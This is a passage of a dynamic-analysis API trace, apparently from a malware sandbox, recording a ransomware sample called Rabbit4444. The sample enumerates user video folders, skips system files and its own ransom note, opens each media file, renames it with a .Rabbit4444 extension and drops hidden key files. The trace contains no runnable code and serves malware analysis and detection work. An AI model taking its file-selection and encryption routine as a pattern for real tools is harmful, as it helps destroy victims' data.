lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3df7050, ftCreationTime.dwHighDateTime=0x1d4c7de, ftLastAccessTime.dwLowDateTime=0x51f13f50, ftLastAccessTime.dwHighDateTime=0x1d4cf82, ftLastWriteTime.dwLowDateTime=0xe62b7586, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0048.406] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.406] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.406] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.406] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.406] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3df7050, ftCreationTime.dwHighDateTime=0x1d4c7de, ftLastAccessTime.dwLowDateTime=0x51f13f50, ftLastAccessTime.dwHighDateTime=0x1d4cf82, ftLastWriteTime.dwLowDateTime=0xe62b7586, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.406] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.406] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.406] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.406] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.406] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.406] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe62b7586, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe62b7586, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe62b7586, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.406] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.406] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.407] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55389560, ftCreationTime.dwHighDateTime=0x1d4c5ae, ftLastAccessTime.dwLowDateTime=0x4e1dbfd0, ftLastAccessTime.dwHighDateTime=0x1d4d148, ftLastWriteTime.dwLowDateTime=0x4e1dbfd0, ftLastWriteTime.dwHighDateTime=0x1d4d148, nFileSizeHigh=0x0, nFileSizeLow=0x144a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BDCHN3cxOVU.avi", cAlternateFileName="BDCHN3~1.AVI")) returned 1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="Rabbit4444.exe") returned -1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2=".") returned 1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="..") returned 1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="windows") returned -1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="bootmgr") returned -1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="pagefile.sys") returned -1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="boot") returned -1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="ids.txt") returned -1 [0048.407] lstrcmpiW (lpString1="BDCHN3cxOVU.avi", lpString2="NTUSER.DAT") returned -1 [0048.407] lstrcpyW (in: lpString1=0x130eb72, lpString2="BDCHN3cxOVU.avi" | out: lpString1="BDCHN3cxOVU.avi") returned="BDCHN3cxOVU.avi" [0048.407] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\BDCHN3cxOVU.avi", dwFileAttributes=0x0) returned 1 [0048.407] lstrlenW (lpString="BDCHN3cxOVU.avi") returned 15 [0048.407] lstrlenW (lpString="Rabbit4444") returned 10 [0048.407] lstrcmpiW (lpString1="3cxOVU.avi", lpString2="Rabbit4444") returned -1 [0048.407] lstrlenW (lpString=".dll") returned 4 [0048.407] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0048.407] lstrlenW (lpString=".lnk") returned 4 [0048.407] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0048.407] lstrlenW (lpString=".ini") returned 4 [0048.407] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0048.407] lstrlenW (lpString=".sys") returned 4 [0048.407] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0048.407] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\BDCHN3cxOVU.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\bdchn3cxovu.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.408] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.408] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13971831528) returned 1 [0048.408] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83110) returned 1 [0048.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0048.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0048.408] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x147b0, lpName=0x0) returned 0x298 [0048.408] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x147b0) returned 0x70000 [0048.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.410] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13972110659) returned 1 [0048.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0048.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0048.410] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.411] CloseHandle (hObject=0x298) returned 1 [0048.411] CloseHandle (hObject=0x278) returned 1 [0048.414] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\Kagr0\\BDCHN3cxOVU.avi.Rabbit4444") returned 55 [0048.414] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\BDCHN3cxOVU.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\bdchn3cxovu.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\BDCHN3cxOVU.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\bdchn3cxovu.avi.rabbit4444"), dwFlags=0x1) returned 1 [0048.415] InterlockedExchangeAdd (in: Addend=0xff618, Value=83120 | out: Addend=0xff618) returned 16287232 [0048.415] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3342 [0048.415] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e8910, ftCreationTime.dwHighDateTime=0x1d4d412, ftLastAccessTime.dwLowDateTime=0xf3581e70, ftLastAccessTime.dwHighDateTime=0x1d4c859, ftLastWriteTime.dwLowDateTime=0xf3581e70, ftLastWriteTime.dwHighDateTime=0x1d4c859, nFileSizeHigh=0x0, nFileSizeLow=0x1798f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G50GPz.flv", cAlternateFileName="")) returned 1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="Rabbit4444.exe") returned -1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2=".") returned 1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="..") returned 1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="windows") returned -1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="bootmgr") returned 1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="pagefile.sys") returned -1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="boot") returned 1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="ids.txt") returned -1 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="NTUSER.DAT") returned -1 [0048.415] lstrcpyW (in: lpString1=0x130eb72, lpString2="G50GPz.flv" | out: lpString1="G50GPz.flv") returned="G50GPz.flv" [0048.415] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\G50GPz.flv", dwFileAttributes=0x0) returned 1 [0048.415] lstrlenW (lpString="G50GPz.flv") returned 10 [0048.415] lstrlenW (lpString="Rabbit4444") returned 10 [0048.415] lstrcmpiW (lpString1="G50GPz.flv", lpString2="Rabbit4444") returned -1 [0048.415] lstrlenW (lpString=".dll") returned 4 [0048.415] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0048.415] lstrlenW (lpString=".lnk") returned 4 [0048.415] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0048.415] lstrlenW (lpString=".ini") returned 4 [0048.415] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0048.415] lstrlenW (lpString=".sys") returned 4 [0048.415] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0048.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\G50GPz.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\g50gpz.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.416] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.416] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13972638462) returned 1 [0048.416] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=96655) returned 1 [0048.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0048.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0048.416] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17c90, lpName=0x0) returned 0x298 [0048.416] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17c90) returned 0x70000 [0048.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.419] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13972933501) returned 1 [0048.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0048.419] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0048.419] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.420] CloseHandle (hObject=0x298) returned 1 [0048.420] CloseHandle (hObject=0x278) returned 1 [0048.423] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\Kagr0\\G50GPz.flv.Rabbit4444") returned 50 [0048.423] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\G50GPz.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\g50gpz.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\G50GPz.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\g50gpz.flv.rabbit4444"), dwFlags=0x1) returned 1 [0048.435] InterlockedExchangeAdd (in: Addend=0xff618, Value=96656 | out: Addend=0xff618) returned 16370352 [0048.435] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3344 [0048.435] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ca1d1c0, ftCreationTime.dwHighDateTime=0x1d4cb06, ftLastAccessTime.dwLowDateTime=0x14403c30, ftLastAccessTime.dwHighDateTime=0x1d4d377, ftLastWriteTime.dwLowDateTime=0x14403c30, ftLastWriteTime.dwHighDateTime=0x1d4d377, nFileSizeHigh=0x0, nFileSizeLow=0x83b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tRYgRmfMiyo_fA kpl4-.flv", cAlternateFileName="TRYGRM~1.FLV")) returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="Rabbit4444.exe") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2=".") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="..") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="windows") returned -1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="bootmgr") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="pagefile.sys") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="boot") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="ids.txt") returned 1 [0048.435] lstrcmpiW (lpString1="tRYgRmfMiyo_fA kpl4-.flv", lpString2="NTUSER.DAT") returned 1 [0048.435] lstrcpyW (in: lpString1=0x130eb72, lpString2="tRYgRmfMiyo_fA kpl4-.flv" | out: lpString1="tRYgRmfMiyo_fA kpl4-.flv") returned="tRYgRmfMiyo_fA kpl4-.flv" [0048.435] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\tRYgRmfMiyo_fA kpl4-.flv", dwFileAttributes=0x0) returned 1 [0048.435] lstrlenW (lpString="tRYgRmfMiyo_fA kpl4-.flv") returned 24 [0048.435] lstrlenW (lpString="Rabbit4444") returned 10 [0048.436] lstrcmpiW (lpString1=" kpl4-.flv", lpString2="Rabbit4444") returned -1 [0048.436] lstrlenW (lpString=".dll") returned 4 [0048.436] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0048.436] lstrlenW (lpString=".lnk") returned 4 [0048.436] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0048.436] lstrlenW (lpString=".ini") returned 4 [0048.436] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0048.436] lstrlenW (lpString=".sys") returned 4 [0048.436] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0048.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\tRYgRmfMiyo_fA kpl4-.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\trygrmfmiyo_fa kpl4-.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.436] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.436] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13974674620) returned 1 [0048.436] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=33716) returned 1 [0048.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0048.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0048.436] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x86c0, lpName=0x0) returned 0x298 [0048.436] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x86c0) returned 0x70000 [0048.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0048.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0048.438] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13974852902) returned 1 [0048.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0048.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0048.438] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.438] CloseHandle (hObject=0x298) returned 1 [0048.438] CloseHandle (hObject=0x278) returned 1 [0048.441] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\Kagr0\\tRYgRmfMiyo_fA kpl4-.flv.Rabbit4444") returned 64 [0048.441] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\tRYgRmfMiyo_fA kpl4-.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\trygrmfmiyo_fa kpl4-.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\tRYgRmfMiyo_fA kpl4-.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\trygrmfmiyo_fa kpl4-.flv.rabbit4444"), dwFlags=0x1) returned 1 [0048.442] InterlockedExchangeAdd (in: Addend=0xff618, Value=33728 | out: Addend=0xff618) returned 16467008 [0048.442] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3346 [0048.442] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ca1d1c0, ftCreationTime.dwHighDateTime=0x1d4cb06, ftLastAccessTime.dwLowDateTime=0x14403c30, ftLastAccessTime.dwHighDateTime=0x1d4d377, ftLastWriteTime.dwLowDateTime=0x14403c30, ftLastWriteTime.dwHighDateTime=0x1d4d377, nFileSizeHigh=0x0, nFileSizeLow=0x83b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tRYgRmfMiyo_fA kpl4-.flv", cAlternateFileName="TRYGRM~1.FLV")) returned 0 [0048.442] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0048.442] lstrcpyW (in: lpString1=0x130eb72, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.442] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.442] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.442] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.443] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.443] CloseHandle (hObject=0x278) returned 1 [0048.443] CloseHandle (hObject=0x27c) returned 1 [0048.444] GetCurrentThreadId () returned 0xd98 [0048.444] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0048.444] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Videos\\IGecK", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\IGecK") returned="C:\\Users\\FD1HVy\\Videos\\IGecK" [0048.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114f28 | out: hHeap=0xe0000) returned 1 [0048.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0048.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\IGecK" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\IGecK") returned="C:\\Users\\FD1HVy\\Videos\\IGecK" [0048.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\IGecK", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\IGecK\\") returned="C:\\Users\\FD1HVy\\Videos\\IGecK\\" [0048.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\IGecK\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\IGecK\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\IGecK\\.BFC0E91B00AE8A0620D3" [0048.445] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\igeck\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.445] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.448] FlushFileBuffers (hFile=0x27c) returned 1 [0048.449] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.449] CloseHandle (hObject=0x27c) returned 1 [0048.450] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\IGecK") returned 28 [0048.450] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.450] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\IGecK\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d22190, ftCreationTime.dwHighDateTime=0x1d4cb9c, ftLastAccessTime.dwLowDateTime=0x87b7710, ftLastAccessTime.dwHighDateTime=0x1d4c99b, ftLastWriteTime.dwLowDateTime=0xe6329ba6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0048.450] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.450] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.450] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.450] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.450] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d22190, ftCreationTime.dwHighDateTime=0x1d4cb9c, ftLastAccessTime.dwLowDateTime=0x87b7710, ftLastAccessTime.dwHighDateTime=0x1d4c99b, ftLastWriteTime.dwLowDateTime=0xe6329ba6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.450] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.450] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.450] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.450] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.450] lstrcmpiW 